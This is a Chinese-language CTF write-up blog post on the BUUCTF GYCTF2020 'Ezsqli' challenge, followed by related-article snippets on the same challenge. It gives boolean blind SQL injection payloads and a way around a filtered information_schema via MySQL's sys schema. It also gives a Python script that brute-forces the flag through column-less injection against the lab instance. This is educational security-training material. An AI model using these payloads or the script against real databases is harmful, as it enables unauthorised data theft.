[GYCTF2020]Ezsqli -wp

最新推荐文章于 2022-04-12 21:10:25 发布
最新推荐文章于 2022-04-12 21:10:25 发布
阅读量370 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/108021427
版权

在这里插入图片描述
打开容器后可以看到一个提交框
尝试一下发现可以进行bool盲注0^1
0^(ascii(substr((select database()),1,1))>0)
可以比较顺利的查到库名

give_grandpa_pa_pa_pa

fuzz后可以发现过滤了or,所以information_schema无法使用,但可以使用sys.schema_table_statistics_with_buffer代替

在这里插入图片描述

id=0^(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),1,1))>0)

可以得出表名为f1ag_1s_h3r3_hhhhh
表名出来后需要使用无列名注入

0^((1,' g')>(select * from f1ag_1s_h3r3_hhhhh))

原理大概就是使用单引号里面的字母与表中数据的字母进行比较,其实就是进行ascii的比较,比如:
b>a
abd>abc
baaaa>abbb //第一个字母大就整体判断为大,如果第一个字母相同再对第二个进行比较。
那么进过了简单的手工尝试可以知道前面几位为FLAG{
那么后面的用脚本跑一下即可。
buu的环境访问太快会429,可以慢慢来,跑出几位就网flag里加几个,慢慢的可以跑出来。当然有能力直接控制线程当然最好。

import requests
url = 'http://bb098698-4715-4fbf-853c-23007c53cb41.node3.buuoj.cn/index.php'
flag='FLAG{'
for j in range(1,50):
    for x in range(28, 128):
        flag1 = flag+chr(x)
        payload = "0^((select 1,'{}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag1)

        data = {'id': payload}
        re = requests.post(url=url, data=data)

        if 'Nu1L' in re.text:
            break;

    flag  += chr(x-1)
    print(flag)
    print(flag.lower())

在这里插入图片描述

冰可乐不加可乐
关注
2021-10-10 buuctf Ezsqli
shallowskyandsea的博客
10-10 486
Ezsqli 打开题目,有输入框,题目名提示是sql注入 输入1 输入2 输入3 先看看过滤 用字典跑跑 (字典有限就跑出来这几个过滤) 可以看到一个关键的information被过滤了 试试无列名注入 这里要用到sys库 schema_table_statistics_with_buffer和x$schema_table_statistics_with_buffer可以 代替information.schema帮我们找到表名 借用隔壁的脚本 ..
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1483
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
[GYCTF2020]Ezsqli
yym68686
09-03 1157
[GYCTF2020]Ezsqli 打开网页发现有个输入框,随便输入1 or 2,发现or被过滤了,因此尝试fuzz看看,还过滤了哪些sql关键词,我使用的fuzz字典: WEB SQL Fuzz Dict 发现if,or,union,information_schema.tables均被过滤,因为输入2||True和2||False的返回结果不一致所以要用盲注来判断每个字符是什么。对于过滤掉information_schema的题目,注意到MySQL5.7的新特性: 由于performance_sche
[GYCTF2020]FlaskApp -wp
freerats的博客
08-19 524
打开后一个base64加密框 在解密处容易输入一些东西会导致报错,还会出一部分源码 @app.route('/decode',methods=['POST','GET']) def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结.
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
CTF逆向-[羊城杯 2020]Bytecode-WP-Python字节码反编译
serfend's blog
04-12 2808
CTF逆向-[羊城杯 2020]Bytecode-WP-Python字节码反编译 来源:https://buuoj.cn/ 内容:无 附件:https://pan.baidu.com/s/15XJLq9jFV_pOtPMzNXG9XA?pwd=tlwo 提取码:tlwo 答案:GWHT{cfa2b87b3f746a8f0ac5c5963faeff73} 总体思路 反编译汇编成py源码 检查源码逻辑发现是一个约束求解(解方程) 使用z3输入条件得到flag 详细步骤 文件信息,打开发现是Python的
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 5274
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
[BUUCTF][GYCTF2020]Ezsqli
weixin_43952190的博客
07-26 2638
[GYCTF2020]Ezsqli 布尔盲注 无列名盲注 抓包,存在post的id参数。 进行测试 id=1时, :Nu1L id=0时, :Error Occured When Fetch Result. id=1’时, :bool(false) id=1’#时,:bool(false) 语句不正确时返回bool(false) 所以猜测是数字型的注入 id=1^1 :Error Occured When Fetch Result. id=1^0 :Nu1L 存在sql注入。
虹润牌19--HR-WP-HZ单屏工频周波表技术手册
"19--HR-WP-HZ单屏系列工频周波表,虹润技术资料" 19--HR-WP-HZ单屏系列工频周波表是由虹润公司推出的智能仪表,专用于交流电工显示和控制。这款仪表具有全面的功能和高效的省配线解决方案,适用于各种工业环境中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值